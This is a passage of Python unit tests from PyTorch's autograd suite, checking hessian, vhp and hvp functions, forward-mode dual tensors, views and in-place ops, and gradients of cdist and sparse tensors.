res = autogradF.hessian(bar2, inp, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res.abs().sum(), 0.)
def test_hessian_err_check_strict_vectorize(self):
def foo(x):
return (x ** 3).sum()
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "not supported together"):
res = autogradF.hessian(foo, inp, strict=True, vectorize=True)
def test_hessian_no_grad(self):
def pow_reducer(x):
return x.pow(3).sum()
inputs = torch.rand(2, 2)
with torch.no_grad():
res = autogradF.hessian(pow_reducer, inputs)
self.assertIsNone(res[0][0].grad_fn)
self.assertIsNone(res[0][1].grad_fn)
self.assertIsNone(res[1][0].grad_fn)
self.assertIsNone(res[1][1].grad_fn)
self.assertNotEqual(res, torch.zeros(2, 2, 2))
with torch.no_grad():
res = autogradF.hessian(pow_reducer, inputs, create_graph=True)
self.assertIsNotNone(res[0][0].grad_fn)
self.assertIsNotNone(res[0][1].grad_fn)
self.assertIsNotNone(res[1][0].grad_fn)
self.assertIsNotNone(res[1][1].grad_fn)
self.assertNotEqual(res, torch.zeros(2, 2, 2))
def _test_hessian_output(self, vectorize):
def pow_reducer(x):
return x.pow(3).sum()
inputs = torch.rand(2, 2)
res = autogradF.hessian(pow_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNone(res.grad_fn)
def add_pow_reducer(x, y):
return (x + y).pow(3).sum()
inputs = (torch.rand(2, 2), torch.rand(2, 2))
res = autogradF.hessian(add_pow_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNone(res[0][0].grad_fn)
self.assertIsNone(res[0][1].grad_fn)
self.assertIsNone(res[1][0].grad_fn)
self.assertIsNone(res[1][1].grad_fn)
def test_hessian_output(self):
self._test_hessian_output(vectorize=False)
def test_hessian_output_vectorize(self):
self._test_hessian_output(vectorize=True)
def _test_hessian_scalar(self, vectorize):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
res = autogradF.hessian(reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
inputs = torch.rand([])
res = autogradF.hessian(reducer, inputs, vectorize=vectorize)
self._assert_same_struct(res, inputs)
def bad_reducer(x):
return x.sum().view(1, 1, 1)
inputs = torch.rand(4, 4)
res = autogradF.hessian(bad_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
def test_hessian_scalar(self):
return self._test_hessian_scalar(vectorize=False)
def test_hessian_scalar_vectorize(self):
return self._test_hessian_scalar(vectorize=True)
def _test_hessian_create_graph(self, vectorize):
def pow_reducer(x):
return x.pow(3).sum()
inputs = torch.rand(2, 2, dtype=torch.double, requires_grad=True)
res = autogradF.hessian(pow_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNotNone(res.grad_fn)
gradcheck(lambda inp: autogradF.hessian(pow_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
gradgradcheck(lambda inp: autogradF.hessian(pow_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
def add_pow_reducer(x, y):
return (x + y).pow(3).sum()
inputs = (torch.rand(2, 2, dtype=torch.double, requires_grad=True),
torch.rand(2, 2, dtype=torch.double, requires_grad=True))
res = autogradF.hessian(add_pow_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNotNone(res[0][0].grad_fn)
self.assertIsNotNone(res[0][1].grad_fn)
self.assertIsNotNone(res[1][0].grad_fn)
self.assertIsNotNone(res[1][1].grad_fn)
def flatten(inp):
return tuple(el_lvl2 for el_lvl1 in inp for el_lvl2 in el_lvl1)
gradcheck(lambda *inp: flatten(autogradF.hessian(add_pow_reducer, inp, create_graph=True, vectorize=vectorize)), inputs)
gradgradcheck(lambda *inp: flatten(autogradF.hessian(add_pow_reducer, inp, create_graph=True, vectorize=vectorize)), inputs)
def foo(x, y):
x = x.cos()
val, hess = autogradF.hessian(add_pow_reducer, (x, y), create_graph=True, vectorize=vectorize)
res = val[0].cos().sum() + val[1].cos().sum() + hess[0].cos().sum()
res = res + hess[1].cos().sum() + x.cos().sum() + y.cos().sum()
return res
gradcheck(foo, inputs)
gradgradcheck(foo, inputs)
def test_hessian_create_graph(self):
self._test_hessian_create_graph(vectorize=False)
def test_hessian_create_graph_vectorize(self):
self._test_hessian_create_graph(vectorize=True)
def test_vhp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
def bar2(a):
return 3 * a.narrow(0, 0, 3)
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to vhp must be either a Tensor"):
res = autogradF.vhp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to vhp must"):
res = autogradF.vhp(bar, inp, v)
err_msg_out = "The Tensor returned by the function given to vhp should contain a single element"
with self.assertRaisesRegex(RuntimeError, err_msg_out):
res = autogradF.vhp(bar2, inp, v)
with self.assertRaisesRegex(RuntimeError, "v has invalid size:"):
res = autogradF.vhp(foo, inp, torch.rand(5))
with self.assertRaisesRegex(TypeError, "The v given to vhp must be either a Tensor or a tuple of Tensors"):
res = autogradF.vhp(foo, inp, (v, 2))
res = autogradF.vhp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def foo(a, b):
return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
inp = (torch.rand(4), torch.rand(5))
v = (torch.rand(4), torch.rand(5))
res = autogradF.vhp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def test_vhp_err_check_strict(self):
def foo(a):
return a.detach().sum()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone().sum()
def bar2(a):
# A Linear function for which the jacobian is independent of the input
return (3 * a).sum()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.vhp(foo, inp, v, strict=True)
res = autogradF.vhp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.vhp(bar, inp, v, strict=True)
res = autogradF.vhp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
res = autogradF.vhp(bar2, inp, v, strict=True)
res = autogradF.vhp(bar2, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
def test_vhp_no_grad(self):
def reducer(x):
return x.exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
with torch.no_grad():
res = autogradF.vhp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
with torch.no_grad():
res = autogradF.vhp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_vhp_output(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.vhp(foo, inputs, v)
self._assert_same_struct(res[1], inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3), torch.rand(4))
v = (torch.ones(3), torch.ones(4))
out, vhp_val = autogradF.vhp(bar, inputs, v)
self._assert_same_struct(vhp_val, inputs)
self.assertIsNone(out.grad_fn)
self.assertIsNone(vhp_val[0].grad_fn)
self.assertIsNone(vhp_val[1].grad_fn)
def test_vhp_scalar(self):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.vhp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
inputs = torch.rand([])
v = torch.rand([])
res = autogradF.vhp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
res = autogradF.vhp(reducer, inputs)
self._assert_same_struct(res[1], inputs)
def bad_reducer(x):
return x.sum().view(1, 1, 1)
inputs = torch.rand(4, 4)
v = torch.rand(4, 4)
res = autogradF.vhp(bad_reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
def test_vhp_create_graph(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
v = torch.ones(4, 4, dtype=torch.double, requires_grad=True)
res = autogradF.vhp(foo, inputs, v, create_graph=True)
self._assert_same_struct(res[1], inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.vhp(foo, inp, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.vhp(foo, inp, v, create_graph=True), (inputs, v))
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3, dtype=torch.double, requires_grad=True),
torch.rand(4, dtype=torch.double, requires_grad=True))
v = (torch.ones(3, dtype=torch.double, requires_grad=True),
torch.ones(4, dtype=torch.double, requires_grad=True))
out, vhp_val = autogradF.vhp(bar, inputs, v, create_graph=True)
self._assert_same_struct(vhp_val, inputs)
self.assertIsNotNone(out.grad_fn)
self.assertIsNotNone(vhp_val[0].grad_fn)
self.assertIsNotNone(vhp_val[1].grad_fn)
gradcheck(lambda *args: autogradF.vhp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.vhp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.vhp(bar, (x, y), v, create_graph=True)
return val.cos() + grad[0].cos().sum() + grad[1].cos() + x.cos().sum() + y.cos()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def test_hvp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
def bar2(a):
return 3 * a.narrow(0, 0, 3)
inp = torch.rand(4)
v = torch.rand(4)
res = autogradF.hvp(foo, inp, v)
with self.assertRaisesRegex(TypeError, "The inputs given to hvp must be either a Tensor"):
res = autogradF.hvp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to hvp must"):
res = autogradF.hvp(bar, inp, v)
err_msg_out = "The Tensor returned by the function given to hvp should contain a single element"
with self.assertRaisesRegex(RuntimeError, err_msg_out):
res = autogradF.hvp(bar2, inp, v)
with self.assertRaisesRegex(RuntimeError, "v has invalid size:"):
res = autogradF.hvp(foo, inp, torch.rand(5))
with self.assertRaisesRegex(TypeError, "The v given to hvp must be either a Tensor or a tuple of Tensors"):
res = autogradF.hvp(foo, inp, (v, 2))
res = autogradF.hvp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def foo(a, b):
return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
inp = (torch.rand(4), torch.rand(5))
v = (torch.rand(4), torch.rand(5))
res = autogradF.hvp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def test_hvp_err_check_strict(self):
def foo(a):
return a.detach().sum()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone().sum()
def bar2(a):
# A Linear function for which the jacobian is independent of the input
return (3 * a).sum()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.hvp(foo, inp, v, strict=True)
res = autogradF.hvp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.hvp(bar, inp, v, strict=True)
res = autogradF.hvp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
res = autogradF.hvp(bar2, inp, v, strict=True)
res = autogradF.hvp(bar2, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
def test_hvp_no_grad(self):
def reducer(x):
return x.exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
with torch.no_grad():
res = autogradF.hvp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
with torch.no_grad():
res = autogradF.hvp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_hvp_output(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.hvp(foo, inputs, v)
self._assert_same_struct(res[1], inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3), torch.rand(4))
v = (torch.ones(3), torch.ones(4))
out, hvp_val = autogradF.hvp(bar, inputs, v)
self._assert_same_struct(hvp_val, inputs)
self.assertIsNone(out.grad_fn)
self.assertIsNone(hvp_val[0].grad_fn)
self.assertIsNone(hvp_val[1].grad_fn)
def test_hvp_scalar(self):
def reducer(x):
return x.exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.hvp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
inputs = torch.rand([])
v = torch.rand([])
res = autogradF.hvp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
res = autogradF.hvp(reducer, inputs)
self._assert_same_struct(res[1], inputs)
def bad_reducer(x):
return x.exp().sum().view(1, 1, 1)
inputs = torch.rand(4, 4)
v = torch.rand(4, 4)
res = autogradF.hvp(bad_reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
def test_hvp_create_graph(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
v = torch.ones(4, 4, dtype=torch.double, requires_grad=True)
res = autogradF.hvp(foo, inputs, v, create_graph=True)
self._assert_same_struct(res[1], inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.hvp(foo, inp, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.hvp(foo, inp, v, create_graph=True), (inputs, v))
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3, dtype=torch.double, requires_grad=True),
torch.rand(4, dtype=torch.double, requires_grad=True))
v = (torch.ones(3, dtype=torch.double, requires_grad=True),
torch.ones(4, dtype=torch.double, requires_grad=True))
out, hvp_val = autogradF.hvp(bar, inputs, v, create_graph=True)
self._assert_same_struct(hvp_val, inputs)
self.assertIsNotNone(out.grad_fn)
self.assertIsNotNone(hvp_val[0].grad_fn)
self.assertIsNotNone(hvp_val[1].grad_fn)
gradcheck(lambda *args: autogradF.hvp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.hvp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.hvp(bar, (x, y), v, create_graph=True)
return val.cos() + grad[0].cos().sum() + grad[1].cos() + x.cos().sum() + y.cos()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def test_jacobian_match_vjp_jvp(self):
def foo(x):
return x ** 3 + x.sum()
inputs = torch.rand(4)
v = torch.rand(4)
jac = autogradF.jacobian(foo, inputs)
jvp = autogradF.jvp(foo, inputs, v)[1]
vjp = autogradF.vjp(foo, inputs, v)[1]
self.assertEqual(jvp, torch.mm(jac, v.unsqueeze(1)).squeeze(1))
self.assertEqual(vjp, torch.mm(v.unsqueeze(0), jac).squeeze(0))
def test_hessian_match_vhp_hvp(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4)
v = torch.rand(4)
hes = autogradF.hessian(foo, inputs)
hvp = autogradF.hvp(foo, inputs, v)[1]
vhp = autogradF.vhp(foo, inputs, v)[1]
self.assertEqual(hvp, torch.mm(hes, v.unsqueeze(1)).squeeze(1))
self.assertEqual(vhp, torch.mm(v.unsqueeze(0), hes).squeeze(0))
class TestAutogradForwardMode(TestCase):
def tearDown(self):
# Ensure that a failing test won't make others fail
while fwAD._current_level >= 0:
fwAD.exit_dual_level()
super().tearDown()
def test_forward_level_cleanup(self):
def get_tensor_and_weak_ref():
# Create a new Tensor and weak reference
t = torch.rand(2, requires_grad=True)
return t, torch._C._WeakTensorRef(t)
# Sanity check that the helper function works as expected
t, t_ref = get_tensor_and_weak_ref()
self.assertFalse(t_ref.expired())
del t
self.assertTrue(t_ref.expired())
# Main test code
foo = torch.rand(2)
with fwAD.dual_level():
tangent, tangent_ref = get_tensor_and_weak_ref()
self.assertFalse(tangent_ref.expired())
dual = fwAD.make_dual(foo, tangent)
self.assertFalse(tangent_ref.expired())
# Make sure that the tangent we provided has been re-used as is
self.assertTrue(fwAD.unpack_dual(dual)[1] is tangent)
# Make sure that dual is keeping the tangent alive
del tangent
self.assertFalse(tangent_ref.expired())
# Make sure that the dual level does not keep the c++
# version of the tangent alive
del dual
self.assertTrue(tangent_ref.expired())
def test_size_check(self):
foo = torch.rand(2)
tangent = torch.rand(3)
with fwAD.dual_level():
with self.assertRaisesRegex(RuntimeError, "Trying to set a forward gradient that has a different size"):
dual = fwAD.make_dual(foo, tangent)
dual = fwAD.make_dual(foo, tangent[1:])
# The following test functions want to ensure all the following behaviors:
# - Ensure that default level system in the python binding works
# - Ensure that only level 0 exists and nesting is properly disabled
# - Ensure that printing works fine
# - Ensure that basic packing/unpacking works
# - Ensure that advanced packing/unpacking works
# - For memory / version counter share
# - For backward AD (regular ops)
# - Ensure that view + inplace for both modes work fine
# - Ensure we do proper cleanup on exit of a level
def test_default_level(self):
foo = torch.rand(2)
bar = torch.rand(2)
with fwAD.dual_level():
baz = fwAD.make_dual(foo, bar)
baz_primal, baz_tangent = fwAD.unpack_dual(baz)
self.assertEqual(baz_primal, foo)
# We don't actually need to enforce that these two are the exact same python
# object, feel free to relax in the future
self.assertIs(baz_tangent, bar)
baz_primal, baz_tangent = fwAD.unpack_dual(baz)
self.assertEqual(baz_primal, foo)
self.assertEqual(baz_tangent, None)
def test_nested_level(self):
with fwAD.dual_level() as level:
# For now only level 0 exists
self.assertEqual(level, 0)
with fwAD.dual_level():
with self.assertRaisesRegex(RuntimeError, "Nested forward mode AD is not supported at the moment"):
nest_level = fwAD.enter_dual_level()
def test_print(self):
with fwAD.dual_level() as level:
a = torch.rand(3)
self.assertFalse("tangent=" in str(a))
b = fwAD.make_dual(a, torch.rand(3))
self.assertFalse("tangent=" in str(a))
self.assertTrue("tangent=" in str(b))
b_primal, b_tangent = fwAD.unpack_dual(b)
self.assertFalse("tangent=" in str(b_primal))
self.assertFalse("tangent=" in str(b_tangent))
def test_basic_packing_unpacking(self):
foo = torch.rand(2)
bar = torch.rand(2)
with fwAD.dual_level():
baz = fwAD.make_dual(foo, bar)
baz_primal, baz_tangent = fwAD.unpack_dual(baz)
self.assertEqual(baz_primal, foo)
self.assertIs(baz_tangent, bar)
# Check that packing/unpacking did not change the input
foo_primal, foo_tangent = fwAD.unpack_dual(foo)
self.assertEqual(foo_primal, foo)
self.assertIsNone(foo_tangent)
def test_advanced_packing_unpacking(self):
foo = torch.rand(2)
bar = torch.ones(2)
# Memory and version counter check
with fwAD.dual_level():
dual = fwAD.make_dual(foo, bar)
# Ensure that they are sharing memory and version counter
self.assertEqual(dual.storage().data_ptr(), foo.storage().data_ptr())
# Ensure we properly share the version counter
self.assertEqual(foo._version, dual._version)
foo.add_(1)
self.assertEqual(foo._version, dual._version)
# Unpacking should only create aliases as well
dual_primal, dual_tangent = fwAD.unpack_dual(dual)
self.assertEqual(dual_primal.storage().data_ptr(), foo.storage().data_ptr())
self.assertEqual(dual_tangent.storage().data_ptr(), bar.storage().data_ptr())
# And the tangent is actually re-used as-is so it is still the same Tensor
self.assertIs(dual_tangent, bar)
# Ensure we properly share the version counter
self.assertEqual(foo._version, dual_primal._version)
foo.add_(1)
self.assertEqual(foo._version, dual_primal._version)
self.assertEqual(bar._version, dual_tangent._version)
bar.add_(1)
self.assertEqual(bar._version, dual_tangent._version)
# backward mode check
with fwAD.dual_level():
foo.requires_grad_()
bar.requires_grad_()
# Check that backward gradients properly propagates through packing/unpacking
dual = fwAD.make_dual(foo, bar)
p, t = fwAD.unpack_dual(dual)
gfoo, gbar = torch.autograd.grad(p.sum(), (foo, bar), retain_graph=True, allow_unused=True)
self.assertEqual(gfoo, torch.ones_like(foo))
self.assertIsNone(gbar)
gfoo, gbar = torch.autograd.grad(t.sum(), (foo, bar), retain_graph=True, allow_unused=True)
self.assertIsNone(gfoo)
self.assertEqual(gbar, torch.ones_like(bar))
# Check that forward gradients are impacted by detach()
detached_dual = dual.detach()
out = detached_dual * 2
p, t = fwAD.unpack_dual(out)
self.assertFalse(p.requires_grad)
self.assertEqual(p, foo * 2)
self.assertIsNone(t)
# Check that forward gradients are not impacted by no_grad
with torch.no_grad():
out = dual * 3
p, t = fwAD.unpack_dual(out)
self.assertFalse(p.requires_grad)
self.assertFalse(t.requires_grad)
self.assertEqual(p, foo * 3)
self.assertEqual(t, bar * 3)
# Check that forward gradients are not impacted by inplace detach
dual = dual.clone()
dual.detach_()
out = dual * 2
p, t = fwAD.unpack_dual(out)
self.assertFalse(p.requires_grad)
self.assertEqual(p, foo * 2)
self.assertIsNone(t)
def test_view_inplace_non_differentiable_views(self):
original_foo = torch.rand(2, dtype=torch.double)
original_bar = torch.ones(2, dtype=torch.double)
# Do clones to be able to compare the values updated inplace
# with the original content of these Tensors
foo = original_foo.clone()
bar = original_bar.clone()
with fwAD.dual_level():
# Note that in this test, we use "update" to mean computing the right tangent for the dual
# All the inplace operations here are expected to update the primal value of the Tensors but
# not always their tangents.
# Also all mentions of "non differentiable view" here means non forward differentiable view
# unless specified otherwise.
# See note [Forward Grad View/inplace] for more details on how these views work.
# Check that inplace ops do not update non-differentiable views
# Non differentiable view
dual = fwAD.make_dual(foo, bar)
dual *= 2
# Check that non differentiable view's tangent was not updated
self.assertIsNone(fwAD.unpack_dual(foo)[1])
# Check that the computed result is correct
self.assertEqual(bar, original_bar * 2)
self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 2)
self.assertEqual(foo, original_foo * 2)
self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 2)
# Other non differentiable view
dual_primal, dual_tangent = fwAD.unpack_dual(dual)
self.assertIsNone(fwAD.unpack_dual(dual_primal)[1])
self.assertIsNone(fwAD.unpack_dual(dual_tangent)[1])
dual_primal *= 2
# Ensure dual's tangent did not change
self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 4)
self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 2)
dual_tangent *= 2
# Ensure dual's primal did not change
self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 4)
self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 4)
def test_view_inplace_differentiable_views(self):
original_foo = torch.rand(2)
original_bar = torch.ones(2)
# Do clones to be able to compare the values updated inplace
# with the original content of these Tensors
foo = original_foo.clone()
bar = original_bar.clone()
with fwAD.dual_level():
# Check that inplace ops do update differentiable view but stop at non differentiable ones
# A non differentiable view
dual = fwAD.make_dual(foo, bar)
# A differentiable view
view = dual.narrow(0, 0, 1)
view *= 2
# Check that non differentiable view was not updated
self.assertIsNone(fwAD.unpack_dual(foo)[1])
# Check that differentiable view was updated
self.assertEqual(fwAD.unpack_dual(dual)[1], torch.tensor([2., 1.]))
self.assertEqual(fwAD.unpack_dual(view)[1], torch.tensor([2.]))
# Check that we track differentiable view even for Tensors that are not dual
baz = torch.rand(2)
baz += dual
self.assertEqual(fwAD.unpack_dual(baz)[1], fwAD.unpack_dual(dual)[1])
# Updates on view should as well
baz = torch.rand(2)
baz[0] = dual[0]
self.assertEqual(fwAD.unpack_dual(baz)[1][0], fwAD.unpack_dual(dual)[1][0])
# Unused values get a gradient of 0
self.assertEqual(fwAD.unpack_dual(baz)[1][1], 0.)
# Check that forward non-differentiable views do prevent gradient update
baz = torch.rand(2)
view = baz.detach()
view += dual
self.assertIsNone(fwAD.unpack_dual(baz)[1])
def test_grad_cleanup(self):
foo = torch.rand(2)
bar = torch.rand(2)
baz = torch.rand(2)
with fwAD.dual_level():
dual = fwAD.make_dual(foo, bar)
self.assertIsNone(fwAD.unpack_dual(foo)[1])
self.assertIs(fwAD.unpack_dual(dual)[1], bar)
self.assertIsNone(fwAD.unpack_dual(dual)[1])
with fwAD.dual_level():
self.assertIsNone(fwAD.unpack_dual(foo)[1])
new_dual = fwAD.make_dual(foo, baz)
dual_primal, dual_tangent = fwAD.unpack_dual(dual)
new_dual_primal, new_dual_tangent = fwAD.unpack_dual(new_dual)
self.assertEqual(dual_primal, new_dual_primal)
self.assertIsNone(dual_tangent)
self.assertEqual(new_dual_tangent, baz)
def test_detach_view_tracking(self):
# Default detach is both forward and backward non-differentiable
foo = torch.rand(2)
foo_weak = torch._C._WeakTensorRef(foo)
out = foo.detach()
del foo
self.assertTrue(foo_weak.expired())
def test_out_variant(self):
with fwAD.dual_level():
foo = fwAD.make_dual(torch.rand(2), torch.rand(2))
bar = torch.rand(2)
with self.assertRaisesRegex(RuntimeError, "out= function"):
torch.add(bar, bar, out=foo)
with self.assertRaisesRegex(RuntimeError, "out= function"):
torch.add(foo, bar, out=bar)
# Generic device type autograd tests.
class TestAutogradDeviceType(TestCase):
def test_min_max_median_backprops_to_all_values(self, device):
for f in [torch.min, torch.max, torch.median, torch.nanmedian]:
x1 = torch.tensor([1., 0., 1., 0., 1., 0.], device=device, requires_grad=True)
x2 = torch.tensor([float('nan'), float('nan'), float('nan')], requires_grad=True)
for x in [x1, x2]:
y = f(x)
y.backward()
self.assertEqual(x.grad.sum(), 1.)
self.assertEqual((x.grad == 1 / 3).sum(), 3)
def test_cdist(self, device):
def _test_euclidean_large_cdist(sizex, sizey=None):
if sizey is None:
sizey = sizex
x = torch.randn(sizex, device=device, dtype=torch.float)
y = torch.randn(sizey, device=device, dtype=torch.float)
eps = 1e-6
# to avoid extremum
x = x - (((x - y) < eps).float() * 2 * eps)
x.requires_grad = True
y.requires_grad = True
dist = torch.cdist(x, y, p=2)
# Do a backward pass to check that it is valid for large
# matrices
loss = dist.sum()
loss.backward()
_test_euclidean_large_cdist((2000, 5))
# Ensure that cdist backward with p<1 does not produce NaNs
def test_cdist_grad_p_lt_1_no_nan(self, device):
for p in [0.99, 0.7, 0.5, 0.1, 0.01]:
x = torch.randn(1, 2, device=device)
y = x.clone().detach() + torch.tensor([[1., 0.]], device=device)
x.requires_grad = True
y.requires_grad = True
result = torch.cdist(x, y, p=p)
result.backward(torch.ones_like(result))
self.assertFalse(torch.isnan(x.grad).any())
self.assertFalse(torch.isnan(y.grad).any())
def test_cdist_same_inputs(self, device):
# Test to detect issues in cdist gradient calculation
# When the distances are 0
sizex = (1, 27, 32)
for p in [0, 1, 2, 3, 1.5, 2.5, float('inf')]:
x = torch.randn(sizex, device=device, dtype=torch.float)
dist_grad = torch.randn((1, 27, 27), device=device, dtype=torch.float)
y = x.clone()
eps = 1e-6
x.requires_grad = True
d = torch.cdist(x, y)
d.backward(dist_grad)
# Check that the backward passs does not contain invalid
# values such as nan or inf
assert torch.isfinite(x.grad).all()
def test_parameter_resize(self, device):
asd = torch.nn.Parameter(torch.ones(16, dtype=torch.double, device=device))
for i in range(2):
with torch.no_grad():
asd.set_(asd[1:])
asd.grad = None
m = torch.cat((asd, asd))
m.sum().backward()
@dtypes(torch.double, torch.cdouble)
def test_sparse_ctor_getter_backward(self, device, dtype):
# See NOTE [ Sparse: autograd and API ] on the expected behavior of this test
def _test(size, sparse_dim, nnz, device):
v_size = [nnz] + list(size[sparse_dim:])
i = torch.rand(sparse_dim, nnz)
i.mul_(torch.tensor(size[:sparse_dim]).unsqueeze(1).to(i))
i = i.to(torch.long)
inp = torch.randn(v_size, dtype=torch.double, device=device, requires_grad=True)
other = self.genSparseTensor(size, sparse_dim, nnz, is_uncoalesced=True, device=device,
dtype=dtype)[0]
def fn(v):
x = torch.sparse_coo_tensor(i, v, size, dtype=dtype, device=device)
y = (x + other).coalesce()
yv = y.values()
new_v = yv.tanh()
z = torch.sparse_coo_tensor(y.indices(), new_v, y.size())
return z.coalesce().values()
gradcheck(fn, (inp,), check_batched_grad=False)
# FIXME: make gradgradcheck work.
# gradgradcheck(fn, (inp,), check_batched_grad=False)
# assert that _values is non-differentiable
with self.assertRaisesRegex(RuntimeError, "does not have a grad_fn"):
other.detach().requires_grad_()._values().backward(torch.ones_like(other._values()))
for empty_i, empty_v, empty_nnz in product([True, False], repeat=3):
sparse_size = [] if empty_i else [2, 1]
dense_size = [1, 0, 2] if empty_v else [1, 2]
nnz = 0 if empty_nnz else 5
